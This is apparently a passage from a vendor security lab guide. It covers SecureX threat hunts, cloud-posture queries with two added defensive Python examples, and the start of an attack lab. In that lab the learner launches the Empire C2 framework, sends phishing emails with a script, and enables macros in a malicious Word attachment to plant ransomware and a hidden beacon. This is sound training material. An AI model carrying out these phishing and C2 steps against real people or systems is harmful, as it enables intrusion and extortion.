    Delete any existing API Clients that may conflict with your Plugin integration:

     3   

    Click Generate API Client.

     4   

    Give it a name and select all so this API can control anything within SecureX. Then click Add New Client.

     5   

    You should see the client ID and client password. Do not close this screen or you will need to repeat this process. Now click the green X icon (upper right corner) to bring up where you enter this information. Scroll between the Client ID and Client Password to paste those into the browser plugin. Then click Authenticate.

     6   

    Now you should have the ability to use the SecureX browser plugin. Go back to the Talos webpage. While on the page, click the green X icon to bring up the plugin. Click the Observable option (Square with small magnifying glass). You will find there are 15 different observables you can check against your network. Click Investigate in Threat Response.

     7   

    This will open Cisco Threat Response, which will start investigating each of the observables from the Talos page. You can track the progress by looking at the enrichments completed section. It will take a few minutes to research all 15 observables. This is done using various API call outs to each tool.

     8   

    Once complete, you will see a diagram representing how these observables relate to what your security tools see. Scroll to the top to see if any of these observables are seen within your security tools. For this example, there are three hits meaning yes, your network is impacted by one of these threats.

     9   

    Let’s take a quick action. Click the 3 Targets caret to drop down the impacted hosts.

    1. Scroll to the Results section and click the granite Endpoint. Click the drop-down caret beside granite.

    2. Hover over the AMP Host Isolation with Tier 2 Approval to see a description of what this automation does when clicked.

    3. Click AMP Host Isolation with Tier 2 Approval to isolate this host. You will see a green box stating isolation has occurred.

      If you click it a second time, you will stop the isolation, since Secure Endpoint has full control of this endpoint.

     10   

    Next, scroll to the diagram. You should see some hits to malicious URLs; however, they relate back to a clean domain. The easiest approach to reducing this threat is blocking the domain, but what if the clean domain has some business purpose? Rather than just blocking the entire domain, use the drop-down caret and click into a URL to add it to a Cisco Umbrella block policy, representing your web filtering tool.


    Hunt 3 - How to automate investigation response actions with SecureX Orchestrator

    By now you should be familiar with the typical flow of a threat hunt.

    This scenario focuses on the response action, specifically we will see how to automate the ‘R’ in XDR. Regardless of whether the detection was driven by intelligence, tactics, techniques and procedures (TTPs), or some anomaly, you may need to take multiple actions to respond to any given detection. Many SOCs are finding they are swamped with investigation requests leading to an overloaded staff. Rather than attempting to “pedal faster” meaning try to manually keep up, why not automate some of those detection responses, and have those automated response actions triggered from the same tool you already used for the detection? SecureX with its built-in orchestrator allows you to do just that!

    In this hunt you will be further investigating an issue that has already been identified by the Cisco NGFW Event Service as a Security Intelligence (SI) event. The event has been promoted to a Threat Response Incident from the NGFW Event Service. The background story for this next hunt is that you work in the HackMDs Security Operation Center (SOC) and have been passed an incident that needs investigating. It is your job, as Tier 2 support, to verify whether any threat exists and take the appropriate action.

    Procedure


     1   

    To see the newly created Incident, expand the Ribbon and select the Incidents view.

    Search on dcloud (if the dcloud search filter is not already applied). You should see 3 or 4 incidents after applying the dcloud filter.

     2   

    Select the first incident named Security Intelligence Event - URL_SI_Category:dcloud-SI-URL.

    Note: On the right section of the Ribbon, you can see whether this incident has been assigned to anyone. If ASSIGNEE shows No one is assigned - assign yourself, click the assign yourself link:

     3   

    If the assignment already shows the incident is assigned, let’s assign the incident to ourselves by clicking the x next to the existing Assignee, which removes any existing Assignee. Then click the assign yourself link. Now you will notice the Incident is assigned to the logged in user, which you will see on the top right of your screen:

     4   

    Now that the incident is correctly assigned, let’s investigate the incident in Threat Response. Click the Investigate Incident button. This will pull up a list of observables that you can investigate. Check only the IP address 192.168.249.115, then click Investigate Selected:

    It will take roughly 30 seconds for the relation graph to load. Once complete, your relation graph will look similar to the following:

    Note the blue magnifying glass on the one graph node you started the investigation with (IP 192.168.249.115). We can see this internal IP is connected to public IP address 108.62.141.250, which also has a suspicious URL (drinkfoodapp.com) connected to it. Let’s expand our investigation by adding the 108.62.141.250 address to our investigation. Click the caret on that graph node and select Add to current Investigation:

    Once the new relation graph loads, we can see a lot more information about this security intelligence incident. Specifically, we can see there are 2 more local targets connected to that public address, bringing the total target count to 3 in our investigation:

     5   

    The last graph node we are going to add to our investigation is the file with SHA-256 value starting with 0d5a1c0.

    Add the file to the investigation the same way you added the 108.62.141.250 IP address. The new graph may take a couple of minutes to load. Try to rearrange the nodes in the graph to minimize the crossed lines. Do this by placing the observables with the greatest number of connections in the center. Your relation graph should look similar to this after organizing it:

     6   

    Here we can see the observable with the greatest number of relations is the file with SHA-256 starting with 0d5a1c0. Click that observable and notice how the Threat Response Focus feature displays how that observable relates to all its adjacent nodes:

     7   

    With that SHA-256 in focus, we see much more relevant information on the graph. Specifically, that the SHA was attached to multiple emails, both with the same email subject of MidYear Bonus is Here!. We also see that the SHA is connected to public IP address 108.62.141.250. Let’s focus on that next to see how it relates to its adjacent nodes:

     8   

    Here we can see that most of the adjacent nodes are making network connections to 108.62.141.250. We also see that 108.62.141.250 has Targeted a local host in our environment with IP 192.168.249.115.

    Imagine you are investigating this during business hours and your IT policy does not allow configuration changes during business hours. Now would be a great time for a third-party integration to open a ServiceNow ticket. Let’s do just that by clicking the pivot menu on 108.62.141.250 (the V next to the IP address). From the pivot menu scroll down to the Orchestration workflow named 0018 – ServiceNow – Request Firewall Null Route:

     9   

    Let’s open the SecureX Orchestrator now and confirm the Workflow ran successfully. We can then log into Service Now and confirm we see the new ticket created at the time we expect. Open SecureX Orchestration by clicking Orchestration from the SecureX Dashboard. When SecureX Orchestration launches, you are presented with a view of all the Workflows associated with the logged-in user:

     10   

    We would like to view an existing run. To do so, mouse to the left and expand the navigation bar, and click Runs. You are next presented with the Workflow Runs search screen. The Workflow we are interested in seeing is called 0018 – ServiceNow – Request Firewall Null Route. Start typing 0018 and you will see the Workflow appear:

    Note: If you are not sure of the Workflow name when looking for runs, use the percent (%) character in the search field to search all Workflow runs. Select that Workflow and you will be presented with all the 0018 – ServiceNow – Request Firewall Null Route Workflow runs in the last 24 hours:

     11   

    Note the Started on date and time. Let’s login to ServiceNow and confirm a ticket was opened at that time to track adding a Null route for IP 108.62.141.250. As you did earlier in this lab, log into ServiceNow by clicking the ServiceNow link in Demo Ready and provide the credentials listed:

     12   

    Once you are in Service Now, click Change – Open on the left, then look for a Created date that matches when your SecureX Orchestration flow ran. In our example that would be 09:45 on 11/5/2021:

     13   

    Click the Change Request Number link on the left to open the details of the Change Request. After the Change Request details load, you can see the IP address of 108.62.141.250 was correctly passed from SecureX Orchestration to Service Now:


    This concludes our threat hunt. We were able to show how SecureX Orchestration can automate repetitive response actions, such as opening a Change Request ticket in ServiceNow.

    Hunt 4 - Using SecureX with Stealthwatch Enterprise (SWE), a behavioral network detection and response (NDR) tool

    From the viewpoint of the network, having full visibility of the network’s communications and the ability to expose anomalous behavior without relying on signatures adds tremendous value to a SOC. We call these breach defense capabilities, since edge firewalls and other gateway / “north-south” defense tools do not defend against lateral movement and attacks. Keep in mind that your only other options are positioning appliances off of SPAN/mirror ports, placing honeypots within a network, collecting network packets, or waiting for your hosts to be attacked. We feel all of those have huge disadvantages compared to using network telemetry, which already exists within your physical, virtual and cloud networks.

    Cisco Secure Network Analytics (formerly called Cisco Stealthwatch Enterprise (SWE)) goes beyond the detections made by endpoints or firewalls and identifies behaviors related to zero-day malware, insider threats, Advanced Persistent Threats (APTs), Distributed Denial of Service (DDoS) attempts, and other attacks before they wreak havoc on your network. Unlike other security monitoring solutions, SWE monitors not only traffic going in and out of the network, but also lateral, or east-west, traffic inside the network to identify network abuse and insider threats, making it a desired companion tool for threat hunting.

    In this scenario, we use the SecureX integration between SWE, Cisco Threat Response and Cisco Secure Endpoint to take orchestration a step further, with Secure Endpoint acting as the enforcer to mitigate the risk exposure found within the network based on network telemetry. This hunt addresses anomalous behavior caused by one host that is wreaking havoc across several internal hosts, which has surfaced in the SWE Top Alarms by Count tile.

    Note: When baseline and anomaly technology is used, the more a threat attempts to use “stealth” to evade threat detection, the easier it is to detect based on how it compares to normal traffic and behavior.

    Procedure


     1   

    We can add tiles to an existing dashboard, but for this exercise, let’s create one specific for SWE tiles. In SecureX, click the Customize button to add a new tile.

     2   

    Name it something like SWE, and choose to Add All tiles for the SWE section (Stealthwatch Enterprise tiles):

     3   

    Once done, click to Save it.

     4   

    Once complete, you should have the various tiles like this example screenshot:

     5   

    Now it is time to begin our investigation into potential breaches. Notice that the Top Alarms by Count tile shows multiple Worm Propagation Security Events. This is likely a breach, but we need to investigate it to confirm the risk and exposure.

    Let’s drill in to investigate by clicking the Worm Propagation bar, which pivots into the SWE dashboard. With one click you go from SecureX to the specific page within SWE showing the worm propagation details.
     6   

    Let’s open Worm Propagation in the Today’s Alarms tile, which will display all the alarms. Do this by clicking the part of the pie chart representing the Worm Propagation alarms. It appears that the same source host is involved in all of them.

     7   

    Next, we need to understand the details of the Security Event alarm. You will see the basic details under the Details section.

     8   

    When you click the triangle all the way to the left of any Security Event, it displays the details section for the alarm. Those details are explained within the Description section.

     9   

    Next, we will use SecureX to investigate the Security Events in Cisco Threat Response (TR). To do this, first select the action item next to the impacted IP. Next, expand the SecureX options by clicking the V to the right, shown as callout 2. Finally, choose Investigate in Threat Response, shown as callout 3 in the following image.

     10   

    This will open the Cisco Threat Response (TR) Investigate dashboard containing details about the worm propagation. TR provides sightings with various verdicts giving you a deeper understanding of what is involved with the threat being researched. In this case, we have an unknown action occurring that is raising concern. Let’s attempt to understand the magnitude of this potential threat.

    Note: If your screen does not reflect the screenshot below, populated with unknowns, refresh the browser.

     11   

    The TR Investigate Results section provides Details and Threat Context. Let’s view those details by first scrolling to the bottom of the page. Next, check the Details tab and review the Verdict, Sightings, and Indicators tabs. For the definitions of the terms, click Learn More for each term. If you see a Warning indicator, shown as callout 3 in the next example image, it is informing you that only the top 10 sightings are returned; there can be, and likely are, more events.

    Note: If Verdict, Sightings, and Indicators tabs are not displayed, click the Investigated IP address.
     12   

    Click the Sightings section. You will see that the sightings reveal the source of the data. In this example, SWE is the source (no surprises here):

     13   

    Next, click the Indicators tab to see those details.

     14   

    You will see that we have a worm propagation based on the behavior being seen. This isn’t good, now that you have confirmed it with a different tool. Let’s examine the Worm Propagation activity even further to determine its blast radius.

    To broaden the investigation, we will enlist related sources in TR to help visualize the situation being investigated. In the next example image, callout 1 shows the primary source IP displayed with its correlated communications. Let’s add 10.110.10.254 as the related IP, as shown with callout 2 in the following image, and click Related.

     15   

    Notice how 10.100.10.254 has communicated outbound to the systems within the red circle. When you compare that to 10.110.10.254 and the systems it is communicating with, found within the blue circle, you can see that both of these systems are behaving the same way. If you look closely at how this communication reaches out across systems, you can see that system 10.100.10.254 has enlisted 10.110.10.254 to do its bidding.
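    The propagation pattern described above, reduced to detection logic, as an added example (not lab code, and not how Secure Network Analytics implements its alarm): it flags hosts that fan out to many internal peers on one port, then links a fan-out host to the earlier fan-out host that contacted it first. The flow records, the 10.0.0.0/8 internal range and the threshold are constructed assumptions.

```python
"""Behavioral worm-propagation detection over constructed flow records.

Added example for this hunt; not lab code and not how Cisco Secure Network
Analytics implements its Worm Propagation alarm. It models the behavior walked
through above: a host fanning out to many distinct internal peers on one port,
and a peer it touched later starting the same fan-out (10.100.10.254
"enlisting" 10.110.10.254). Flow records, internal range and threshold are
constructed assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network("10.0.0.0/8")]   # assumed internal address space
FANOUT_THRESHOLD = 5                          # distinct internal peers on one port


@dataclass(frozen=True)
class Flow:
    ts: int      # seconds since the start of the capture window
    src: str
    dst: str
    dport: int


def is_internal(ip: str) -> bool:
    return any(ip_address(ip) in net for net in INTERNAL_NETS)


def detect_fanout(flows, threshold=FANOUT_THRESHOLD):
    """Return {src: {"dport", "first_ts", "targets"}} for every internal host
    that contacted at least `threshold` distinct internal peers on one port.
    `targets` maps each peer to the time it was first contacted."""
    targets = defaultdict(dict)   # (src, dport) -> {dst: first_ts}
    for f in sorted(flows, key=lambda flow: flow.ts):
        if not (is_internal(f.src) and is_internal(f.dst)):
            continue              # north-south traffic is out of scope here
        targets[(f.src, f.dport)].setdefault(f.dst, f.ts)
    alarms = {}
    for (src, dport), peers in targets.items():
        if len(peers) >= threshold:
            alarms[src] = {"dport": dport,
                           "first_ts": min(peers.values()),
                           "targets": peers}
    return alarms


def propagation_chain(alarms):
    """Link fan-out hosts into a chain: B's parent is the earliest fan-out host
    that contacted B before B began its own fan-out; roots map to None."""
    chain = {}
    for child, c in alarms.items():
        parents = [p for p, a in alarms.items()
                   if p != child
                   and a["targets"].get(child, float("inf")) < c["first_ts"]]
        chain[child] = (min(parents, key=lambda p: alarms[p]["first_ts"])
                        if parents else None)
    return chain


# Constructed sample: 10.100.10.254 sweeps six peers on 445, touches
# 10.110.10.254 at t=12, and 10.110.10.254 starts its own sweep at t=90.
SAMPLE_FLOWS = (
    [Flow(2 * i, "10.100.10.254", f"10.100.10.{10 + i}", 445) for i in range(6)]
    + [Flow(12, "10.100.10.254", "10.110.10.254", 445)]
    + [Flow(90 + 3 * i, "10.110.10.254", f"10.110.10.{20 + i}", 445)
       for i in range(6)]
    + [Flow(5, "10.100.10.10", "10.100.10.5", 443),   # ordinary internal traffic
       Flow(7, "10.100.10.10", "8.8.8.8", 53),         # outbound, ignored
       Flow(9, "10.100.10.11", "10.100.10.5", 443)]
)


def run_sample():
    alarms = detect_fanout(SAMPLE_FLOWS)
    return alarms, propagation_chain(alarms)


if __name__ == "__main__":
    alarms, chain = run_sample()
    for host, a in sorted(alarms.items(), key=lambda kv: kv[1]["first_ts"]):
        origin = chain[host] or "none (originating offender)"
        print(f"{host}: {len(a['targets'])} peers on tcp/{a['dport']} "
              f"from t={a['first_ts']}s, enlisted by {origin}")
```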

     16   

    Scroll down into the TR Results and click Indicators. This will confirm the observable is performing the worm behavior you were tasked to investigate, based on what Cisco Secure Network Analytics (formerly Cisco Stealthwatch) is seeing.

     17   

    Click the Threat Context section and click the Worm Propagation under the Indicator. TR Threat Context will show sightings for this Worm Propagation for other systems such as for 10.110.10.254 to help you better understand the scope of the problem at hand.

     18   

    In comparison, looking to the right via the originating offender, 10.100.10.254 exhibits the same behavior. Click this system to see its behavior.

     19   

    At this point we have enough information to understand security events fired in Cisco Secure Network Analytics as well as details on how the Worm Propagation is occurring within our environment. Note that there is no known signature to detect this type of behavior, meaning it's likely an IDS or other network tool would miss this threat.

    Let’s mitigate the source of the problem, which is the originating IP address of 10.100.10.254. We can use Secure Endpoint (formerly AMP) orchestration to isolate this host and prevent further damage to other hosts. Do this by clicking the small v-shaped drop-down to see options for the IP of interest. Select AMP host isolation with Tier 2 approval (you may need to scroll down within this menu to locate it beneath the SecureX Orchestration section). This will launch a SecureX orchestration task to isolate this system.

    Obviously, in a real-world scenario, this is just the start of the mitigation process. A real-world incident response would consider all impacted systems, and automation could be used across the entire network to quickly address the entire problem. Our point for this exercise is to show how to collect the details that prove a security tool such as Cisco Secure Network Analytics has correctly identified a threat.

    Summary

    At this point, you have completed four different threat hunting exercises. First, we had you create a dashboard centered around Cisco Secure Endpoint monitoring. Think of this as classic threat hunting with an endpoint detection and response tool. For this first hunt, you were able to quickly identify an infected host, drill into details and apply remediation within a few clicks.

    In the second hunt, we showed you how to collect threat data from any source on the web using the Cisco SecureX scraper options within a web browser plugin and quickly hunt for it within your environment. Imagine how powerful this can be to answer the question “Hey, I heard about a threat. How does it impact our organization?”

    In the third hunt, you moved to a common situation where a higher-tier support member is handed an incident to investigate. You went through the steps of investigating an existing case and even leveraged security orchestration to integrate with ServiceNow, simplifying the response while only making changes during approved business hours.

    Finally, the fourth investigation focused on validating data found within a breach detection tool. It is common for the SOC to ask “why” a tool is showing a threat as well as needing to validate the scope of a breach. You worked through a worm propagation within your environment and were able to identify all systems that were impacted by the event.

    To learn more about threat hunting with Cisco technology, check out the Cisco Threat Hunting workshop, which provides even more threat hunting activities!

    Secure Cloud Insights

    Secure Cloud Insights (SCI) provides complete visibility into your cloud environments to help you identify security and compliance gaps while accelerating threat investigation and response. As an API-driven data platform, this SaaS offering integrates with major cloud providers to ingest your environment's assets and resources into its core engine, which is powered by a graph database. This approach provides visibility into your cloud footprint with a comprehensive inventory of your assets. It helps you understand your attack surface by providing relationship mapping, which allows you to navigate cloud-based entities and the associated access rights. Last, but not least, it strengthens your cloud security posture while improving compliance with security and compliance reporting.

    We are going to use SCI to help us with a few tasks.

    First, let’s log in to the SCI dashboard by choosing the Secure Cloud Insights tab from the Firefox browser. Username and password will auto-populate:

    Click the Account and switch to securexlab:

    Verify:

    At this point, we are ready to tackle our tasks.

    Use cases

    Procedure


     1   

    We need to determine if we are exposing our private AWS datastores to the public. We simply type s3 public in the search (#1) and we are presented with a list of questions. Choose Are there public facing instances that are allowed to access non-public S3 buckets?

    In the snapshot below, we are presented with a relationship graph of the assets. Simply put, we have indeed allowed the public internet access to the s3 bucket on the right, which is a private asset and, upon reviewing its properties, appears to provide HIPAA-related storage.

    Let’s find out why this happened. We follow the path from left to right, from the Internet asset, all the way to s3 asset, and break it down step by step starting with the Internet asset.

    We are presented with details at #1 and a warning that a problem has been detected at #2. Internet has a relationship with jewelery-mexico-schemas-strategist-tuna-service-sg, which is an aws_security_group that allows access to egress and ingress traffic based on an access list. In this case, it appears that the reason a problem was detected is due to a violation of an ec2-restricted-ssh policy:

    Focusing on the jewelery-mexico-schemas-strategist-tuna-service-sg asset, which protects our aws_instance i-0613d3de2dbbce070, we review the details at #1 and the access list details at #2, for which we scroll and check all the rules. The rules indicate tcp and udp ports 0-65535 are allowed. At this point, it is clear the access list misconfiguration is the culprit. However, it is not directly related to the private s3 bucket. Let’s dig more.

    In the next snapshot below, at #1, our aws_instance i-0613d3de2dbbce070 is used by the AccountName fuchsia-research-pizza-service-keypair:

    The AccountName fuchsia-research-pizza-service-keypair is assigned (#1), to the aws_iam_role dram-coherent-pants-orchestrate-service-9tdl1py9jo-0022e2a0e8e84d4-policy (#2) in screenshot below:

    And finally, aws_iam_role is assigned (#1) to the AccessPolicy aws_iam_role_policy dram-coherent-pants-orchestrate-service-9tdl1py9jo-0022e2a0e8e84d4-policy which allows full control (#2) of the s3 private datastore bucket:

    During the graph tracing, we determined that it is not only the access list that is misconfigured: an account is also assigned to a role that is granted full access, via a role policy, to a private asset, the s3 bucket. This effort provides the necessary visibility, with evidence, which is useful information for the Incident Response and Audit teams alike.
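    The hop-by-hop trace above as a graph search, added here as an example; it is not Secure Cloud Insights code or J1QL and queries no cloud account. Asset names are the ones shown in the lab; the relationship labels, the property values, the bucket name and the second, benign branch are constructed.

```python
"""Tracing an Internet-to-private-S3 exposure path through an asset graph.

Added example; not Secure Cloud Insights code or its J1QL. It models the
walk from the lab as a small directed graph (asset names from the lab;
relationship labels, property values, bucket name and the benign branch are
constructed) and searches for every path from the Internet to a non-public
S3 bucket, naming the weak link found at each hop.
"""
from collections import defaultdict

SG = "jewelery-mexico-schemas-strategist-tuna-service-sg"
INSTANCE = "i-0613d3de2dbbce070"
ACCOUNT = "fuchsia-research-pizza-service-keypair"
ROLE = "role/dram-coherent-pants-orchestrate-service-9tdl1py9jo-0022e2a0e8e84d4-policy"
POLICY = "policy/dram-coherent-pants-orchestrate-service-9tdl1py9jo-0022e2a0e8e84d4-policy"
BUCKET = "hipaa-records-bucket"          # constructed name for the private bucket

# node id -> properties (constructed to mirror the lab's findings)
NODES = {
    "Internet": {"class": "Internet"},
    SG: {"class": "aws_security_group",
         # (protocol, from_port, to_port, source CIDR)
         "ingress": [("tcp", 0, 65535, "0.0.0.0/0"), ("udp", 0, 65535, "0.0.0.0/0")]},
    INSTANCE: {"class": "aws_instance"},
    ACCOUNT: {"class": "AccountName"},
    ROLE: {"class": "aws_iam_role"},
    POLICY: {"class": "aws_iam_role_policy", "actions": ["s3:*"]},
    BUCKET: {"class": "aws_s3_bucket", "public": False, "classification": "HIPAA"},
    # benign branch (constructed): HTTPS-only group in front of a public website
    "web-sg": {"class": "aws_security_group", "ingress": [("tcp", 443, 443, "0.0.0.0/0")]},
    "i-web": {"class": "aws_instance"},
    "web-keypair": {"class": "AccountName"},
    "role/web": {"class": "aws_iam_role"},
    "policy/web": {"class": "aws_iam_role_policy", "actions": ["s3:GetObject"]},
    "public-site-bucket": {"class": "aws_s3_bucket", "public": True},
}

# (source, relationship, target); relationship labels are constructed
EDGES = [
    ("Internet", "ALLOWS", SG), (SG, "PROTECTS", INSTANCE), (INSTANCE, "USES", ACCOUNT),
    (ACCOUNT, "ASSIGNED", ROLE), (ROLE, "ASSIGNED", POLICY), (POLICY, "ALLOWS", BUCKET),
    ("Internet", "ALLOWS", "web-sg"), ("web-sg", "PROTECTS", "i-web"),
    ("i-web", "USES", "web-keypair"), ("web-keypair", "ASSIGNED", "role/web"),
    ("role/web", "ASSIGNED", "policy/web"), ("policy/web", "ALLOWS", "public-site-bucket"),
]


def find_exposure_paths(nodes, edges, start="Internet"):
    """Depth-first search for every simple path from `start` to a bucket whose
    `public` property is False (the lab's "non-public S3 bucket" question)."""
    adj = defaultdict(list)
    for src, _rel, dst in edges:
        adj[src].append(dst)
    found = []

    def walk(node, path):
        props = nodes[node]
        if props["class"] == "aws_s3_bucket":
            if not props.get("public", False):
                found.append(list(path))
            return                      # buckets are leaves in this model
        for nxt in adj[node]:
            if nxt not in path:         # simple paths only, no cycles
                path.append(nxt)
                walk(nxt, path)
                path.pop()

    walk(start, [start])
    return found


def weak_links(nodes, path):
    """Explain why each hop on a path matters, mirroring the per-asset review."""
    findings = []
    for n in path:
        p = nodes[n]
        if p["class"] == "aws_security_group":
            for proto, lo, hi, cidr in p["ingress"]:
                if cidr != "0.0.0.0/0":
                    continue
                if (lo, hi) == (0, 65535):
                    findings.append(f"{n}: {proto} 0-65535 open to the internet")
                if proto == "tcp" and lo <= 22 <= hi:
                    findings.append(f"{n}: ssh reachable from anywhere (ec2-restricted-ssh)")
        elif p["class"] == "aws_iam_role_policy" and any(a in ("s3:*", "*") for a in p["actions"]):
            findings.append(f"{n}: grants full control of the bucket")
        elif p["class"] == "aws_s3_bucket" and p.get("classification"):
            findings.append(f"{n}: non-public bucket holding {p['classification']} data")
    return findings


if __name__ == "__main__":
    for path in find_exposure_paths(NODES, EDGES):
        print(" -> ".join(path))
        for finding in weak_links(NODES, path):
            print("   !", finding)
```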

     2   

    Our policy states that all datastores need to be encrypted. Let’s run a query to determine if we are compliant with our policy. As there are multiple ways to perform the query, we will use the Visual Query Builder. Click on #1, #2, and #3 per the following screenshot:

    For the next steps:

    (#1) under Classes, find DataStore and (#2) drag DataStore into the middle canvas. (#3) double click DataStore. (#4) create filters and type encrypted, set operator to =, property value to false, and (#5) click ADD:

    In the snip below, (#1) verify the right side of the screen and (#2) run the query:

    We are presented with the results below. (#1) displays the query in J1 Query Language format, and (#2) the column with the results, which can be exported (#3) into a CSV or JSON, or be shared as a link:

    To summarize, we were able to quickly produce DataStore Encryption policy compliance results across all of our monitored environments, and share the violations with the appropriate teams for mitigation.

     3   

    Multi-factor authentication (MFA) must be turned on for the Account Root User for all of our AWS accounts. Let’s run a query (#1) and pick (#2) to determine which accounts are not MFA enabled:

    Now, we have an option to pick the negative (#1):

    And quickly, we have our results, which can be shared with the appropriate teams who are able to mitigate.

     4   

    Our developers use NPM packages in the code of many of our applications. Recently, reports surfaced with information regarding vulnerability in NPM package version 1.0.0. Let’s determine if any of our applications are using this vulnerable NPM package version.

    Using the J1QL Visual Query Builder once again, we drill in:

    Once in J1QL, choose Types (#1), search for NPM (#2), drag npm_package to the canvas and double-click on it (#3). On the right side, choose Filters (#4); in Property Name, type version to search for the version property and choose it (#5); for Operator, choose = (#6); and for the attribute value, type 1.0.0 and click ADD. Your Query Preview must reflect (#8). Run the query (#9):

    We discover that two code modules are using this vulnerable version:

    Let’s determine the blast radius by checking if these packages have relationships with other assets. We will choose to view in graph format (#1):

    We find both assets isolated per the screenshot below:

    Clicking on one renders options to get information via the circular icon, relationship mapping via the ellipses, or to hide the asset. We choose the ellipses.

    And, we find no relationship with any other asset, which is great news. The other asset exhibits the same result.

    The conclusion is that we have a known vulnerable npm package used by two code modules independent of each other, and from all other assets. Whew!


    Cloud Security Posture Management

    As a final task, let’s utilize the Cloud Security Posture Management reporting capabilities to check for HIPAA compliance.

    Navigate following #1, #2, and type in CDC-HIPAA at #3 and double click at #4.

    We are presented with the CDC HIPAA compliance check dashboard where we can quickly check our gaps. Per #1, apply the Gap Detected filter. Per #2, verify the filter was applied, and click the link Protection from malicious software, per #3:

    At #1, we are presented with the HIPAA standard. At #2, click to expand the Gap to find security agents monitoring and protecting server instances. At #3, we are presented with Protected and Not Protected (this field may appear blank due to text and background contrast). Hover your mouse over it and click it. This information can be utilized to mitigate and become compliant.

    Conveniently, SCI provides the ability to export the entire CDC HIPAA report. Click the framework link (#1) and download the PDF (#2).

    Lastly, let’s check out the Insights (#1) dashboard customized with focus on AWS S3 Security and use it determine our security posture for our data stores:

    Navigating by following #1 to T4, we are presented with the dashboard below. Quickly, we learn that at #2, we have 226 S3 Buckets which are without Secure Transport enabled. At #3, 101 are without default encryption enabled. At #4, good news, there are no non-public buckets exposed publicly. And finally, at #5, our non-public buckets with objects which can be exposed publicly are displayed.

    These tasks demonstrated how to use Secure Cloud Insights to provide comprehensive Cloud Security Posture Management (CSPM) and Reporting capabilities to achieve better compliance, detect security risks and greatly reduce your mean time to resolution. This completes our exercise.

    End to End Exploitation – Advanced Attack Lab

    Value Proposition: In a previous CDC lab titled “The Ransomware Scenario – Lab 4," Mr. Black sent multiple phishing emails to our target environment with attachments that infected the host with ransomware. During the attack, several setup tasks were performed by the attacker that were not fully explained. This is where Mr. Purple had instructed Mr. Blue to add hidden malware within Mr. Black’s ransomware attack in an attempt to establish a deep foothold within the HackMDs environment.

    Important: 

    Before you start this lab: Log in to Jumphost 2 and the Dr.Workstation. Jumphost 2 represents lpeterson, who will be a target for your attack.

    Note: 

    There have been many cases in the real world where different attack parties leverage existing malware as a pivot point into a target’s network. There have even been cases where malware enables security on an infected host to prevent other malicious parties from infecting the system once it has been successfully compromised!

    During the previously executed incident response performed by the HackMDs SOC, there was a discovery of Powershell.exe beaconing, but it was ignored because Mr. Black’s ransomware was removed by the SOC. Those beacons were designed to be highly visible; however, in the real world, beaconing tends to be hidden and difficult to detect. Those beacons are a form of callback to an attacker system, which for today’s lab are callbacks to Mr. Purple’s C2 server. This is how Empire, the first attack tool you will be using today, works: Mr. Purple is able to send commands to compromised systems through a beacon form of communication. This is limited in functionality versus having complete control of an endpoint through a full RAT (remote access tool kit), which we will explore later in this lab.

    For this scenario, we are going to redeliver Mr. Black’s ransomware attack, representing what previously occurred. Once delivered, we will assume the ransomware will be remediated, as it was when we prevented Mr. Black from extorting HackMDs. This will also launch Mr. Purple’s attack that was never identified, giving Mr. Purple a chance to compromise the HackMDs network even though the ransomware is being remediated!

    Note: 

    Make time for this lab which is longer than others. Expect to spend two-four hours to complete all scenarios.

    Lab Resources

    Attacker Resource 1: Kali Linux sitting on the outside network

    Attacker Resource 2: Ubuntu Server hosting various tools for the attacker

    Target Resource 1: HackMDs internal user

    Target Resource 2: HackMDs web portal hosting patient medical dosage

    Welcome to the Empire!

    Now, you will start up Empire.

    Before you begin

    As the attacker, you will be connecting to our Attacker Kali Linux system. This is where you will stage your attacks.

    • Prerequisite 1: Connect to the Kali Linux system.

    • Prerequisite 2: Click the terminal icon to open the terminal:

    Procedure


     1   

    When you are inside that folder, type ./start-empire

     2   

    Use the command root@kali:# cd /root

    You will see that Empire has started in a "screen" session. Let's connect to it and interact with it.

     3   

    To see if Empire is running, you can type screen -ls.

     4   

    To attach to the Empire Session, type screen -r empire.

    Note: 

    Empire is an exploitation simulation tool that is designed to simulate advanced attacks that are extremely difficult to defend against. For this lab, we have simplified the attack by using the default settings. In the real world, attackers will change various aspects of the attack, such as the callback behavior and associated URLs, and obfuscate the agent to prevent detection.

     5   

    Leave your Empire window up. You will want to come back to it later.

    Now you will launch the phishing attack used by Mr. Black to infect the HackMDs administrators.

     6   

    Click the Terminal icon to launch a new terminal window.

    Note: 

    The email content does not matter, because you are acting as both Victim and Attacker. In the real world, you would need to develop a clever message that would trick your target to perform the following actions or they would probably delete your email.

     7   

    To go to the desktop, use the command cd /root/Desktop.

     8   

    Run the script to send the phishing emails; type ./send-phish.sh.

    Note: 

    There is a period (.) before the "/send-phish.sh" part of the command. Try running from the root. If this fails, go to the Desktop and run the script.


    What to do next

    Move to the next scenario, where you will play the Victim (aka a user within HackMDs) who receives the fake email, opens it, and becomes infected with ransomware. The adventures have just begun!

    Gone Phishing

    Next, you will play the part of the Victim, aka a user within HackMDs who receives the fake email and opens it, which results in their system being infected with ransomware.

    Procedure


     1   

    Click the Back button on your browser to return to the guacamole window with all the sessions:

     2   

     3   

    Choose the Dr. Desktop. At this point, you are acting as the victim. In this example, you are the employee Dr. Howser.

     4   

    Log in to the DR workstation, and open Outlook from the desktop icon.

     5   

    It may take a moment or two for the mail to reach the mailbox. When you see the fake email in Dr. Howser’s inbox, select it.

     6   

    Double-click the Word Document and read it. Keep in mind that this content represents how users would fall for this phishing attack and execute an unauthorized file. This happens all the time in the real world.

     7   

    The Microsoft Word program will now start up. In the Microsoft Word document, you will be asked to “Enable Editing” in the Protected View yellow ribbon bar. Click the Enable Editing button; then, from the Security Warning, click Enable Content.

     8   

    When the file has executed, the Phishing Document will tell you to enable macros. Click Enable Content.

     9   

    The command-line window will open behind the Outlook client. Real malicious software would run in the background to avoid things like this, since this behavior would alert the user that something is not right with the file. We didn’t focus on stealth since this is a lab environment. Real malware would hide and attempt to spread at this point as well.

     10   

    Now close the Microsoft Word application completely.

     11   

    When you see the error about spoolsvc.exe not starting, click Close the Program.

     12   

    The ransomware and other infections are of no consequence to our labs, so at this point we will continue back on the Kali Linux environment. The following illustrations show the system infected with the ransomware used by Mr. Black.

     13   

    This typically takes three to seven minutes to show up, but you do not need to wait.


    This attack will be remediated by the HackMDs SOC; however, they will not see the hidden exploitation that you will use as Mr. Purple.

    Next, it's time to check the connection table in Kali Linux and move onto our Empire Implants!

    Empire Implants

